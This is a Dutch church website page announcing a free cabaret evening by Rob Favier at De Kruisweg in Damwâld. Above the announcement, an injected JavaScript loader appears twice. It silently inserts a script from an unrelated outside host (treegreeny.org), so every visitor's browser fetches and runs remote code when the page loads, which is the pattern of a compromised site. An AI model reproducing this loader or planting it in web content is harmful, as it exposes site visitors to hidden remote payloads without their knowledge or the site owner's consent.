;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Rob Favier in De Kruisweg Damwâld - PKN Damwâld

Rob Favier in De Kruisweg Damwâld

Gepubliceerd op: dinsdag 9 januari

Op 3 februari a.s. komt cabaretier Rob Favier (liedjesschrijver, zanger en entertainer) voor een optreden naar de Kruisweg in Damwâld.

Zoals velen eerder ontdekt hebben, heeft hij een geheel eigen manier van optreden; een mengeling van liedjes en verhalen waarbij het humoristische aspect duidelijk aanwezig is. Toch doet dat geen afbreuk aan de diepe inhoud van zijn woorden. Het zoeken naar datgene wat echt waardevol is, vanuit het grote nieuws van God ontdekken wat we daarmee kunnen in ons dagelijks leven. Een plek vinden als gelovig mens in de huidige maatschappij. Muziek met een glimlach wat is bedoeld voor jong en oud!

Het optreden begint om 20:00 uur, de deur gaat open om 19:30 uur. De toegang is gratis!